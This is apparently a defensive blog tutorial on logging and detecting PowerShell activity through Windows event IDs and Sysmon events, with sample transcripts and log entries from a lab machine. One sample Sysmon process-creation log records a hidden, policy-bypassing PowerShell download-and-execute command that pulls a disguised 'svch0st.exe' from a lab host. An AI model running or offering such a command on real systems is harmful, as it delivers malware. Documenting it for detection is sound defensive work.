Note: If you need to zoom in, you can click on the image.
In this blog post, we will cover how to track PowerShell activity. Let’s start off with some Windows Event Log.
Logging PowerShell Activity
Majority of the PowerShell logging falls under Computer Configuration -> Policies -> Windows PowerShell.
Here are the options available to us:
Module Logging help with event id: 800 and event id: 4103.
Turn on PowerShell Script Block Logging for event id: 4104.
PowerShell Transcription record everything what the user do within the PowerShell session.
For example:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
**********************
Windows PowerShell transcript start
Start time: 20240522143937
Username: TESTDUMMY\Administrator
RunAs User: TESTDUMMY\Administrator
Configuration Name:
Machine: DUMMYC1 (Microsoft Windows NT 10.0.19045.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 17368
PSVersion: 5.1.19041.4412
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.4412
BuildVersion: 10.0.19041.4412
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20240522143956
**********************
PS C:\Users\Administrator> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : testdummy.com
IPv4 Address. . . . . . . . . . . : 192.168.109.5
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.109.1
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
|
Window Event Log
Event ID: 4688 Process has been created
Allow us to know when PowerShell was started.
From the picture below, we can see that powershell.exe was started on May 2023, 2024 @ 1:45:35
.
Additionally, in Windows, each command you run has it own separate process. As you can see from the picture below,
We see that the process id of powershell.exe (5372) is the parent process id of whoami.exe. What does that mean? That essentially mean that a user used PowerShell and used the whoami command.
Event ID: 400 Powershell Logging
This event ID is similar to event ID: 4688. The only difference is that this event id only track when Powershell.exe is started.
Details:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
Engine state is changed from None to Available.
Details:
NewEngineState=Available
PreviousEngineState=None
SequenceNumber=13
HostName=ConsoleHost
HostVersion=5.1.19041.4412
HostId=be286975-3018-400f-b789-f596ce246438
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.4412
RunspaceId=a738cd72-eb7d-4c73-80bf-091eea0eaa39
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
|
Event ID: 800 & 4103 Module loading and Add-Type logging
Logs all loaded modules.
Event ID: 4104 Script Block logging
Log the PowerShell script. If a long PowerShell script is run, then it will divide the script into multiple parts.
Example:
Sysmon Events
Event ID: 1 Process Creation
Track when a process have been created and the command line that the process ran.
Example:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
Process Create:
RuleName: technique_id=T1059.001,technique_name=PowerShell
UtcTime: 2024-05-23 19:03:05.132
ProcessGuid: {e58af071-92e9-664f-4204-000000002500}
ProcessId: 18232
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.19041.3996 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -c "IEX ((New-Object System.Net.Webclient).DownloadString('http://192.168.109.6:9000/svch0st.exe'))"
CurrentDirectory: C:\Users\Administrator\
User: TESTDUMMY\Administrator
LogonGuid: {e58af071-f906-664e-5117-120000000000}
LogonId: 0x121751
TerminalSessionId: 1
IntegrityLevel: High
Hashes: SHA1=801262E122DB6A2E758962896F260B55BBD0136A,MD5=2E5A8590CF6848968FC23DE3FA1E25F1,SHA256=9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3,IMPHASH=3D08F4848535206D772DE145804FF4B6
ParentProcessGuid: {e58af071-92d4-664f-4004-000000002500}
ParentProcessId: 16720
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ParentUser: TESTDUMMY\Administrator
|
Event ID: 7 Image Loaded
Better source for gaining visibility into PowerShell since it will record any process that runs PowerShell by focusing on the modload for System.Management.Automation.dll
and System.Management.Automation.ni.dll
.
EventID: 10 Process access another process.
This eventid track when an process access another process.
Example:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
Process accessed:
RuleName: technique_id=T1055.001,technique_name=Dynamic-link Library Injection
UtcTime: 2024-05-23 01:55:15.261
SourceProcessGUID: {e58af071-96c2-664f-6e04-000000002500}
SourceProcessId: 19452
SourceThreadId: 14772
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetProcessGUID: {e58af071-ad33-664f-a704-000000002500}
TargetProcessId: 16164
TargetImage: C:\Windows\system32\whoami.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9e9c4|C:\Windows\System32\KERNELBASE.dll+59655|C:\Windows\System32\KERNELBASE.dll+566d6|C:\Windows\System32\KERNEL32.DLL+1cec4|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+3512b6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+2b3c09|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+2b3579|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+12826a9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1198b2a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+12441cd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1243e8b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1319e8f|UNKNOWN(00007FFA3BAC6611)
SourceUser: TESTDUMMY\Administrator
TargetUser: TESTDUMMY\Administrator
|
Looking above, we see that PowerShell was seen accessing whoami.exe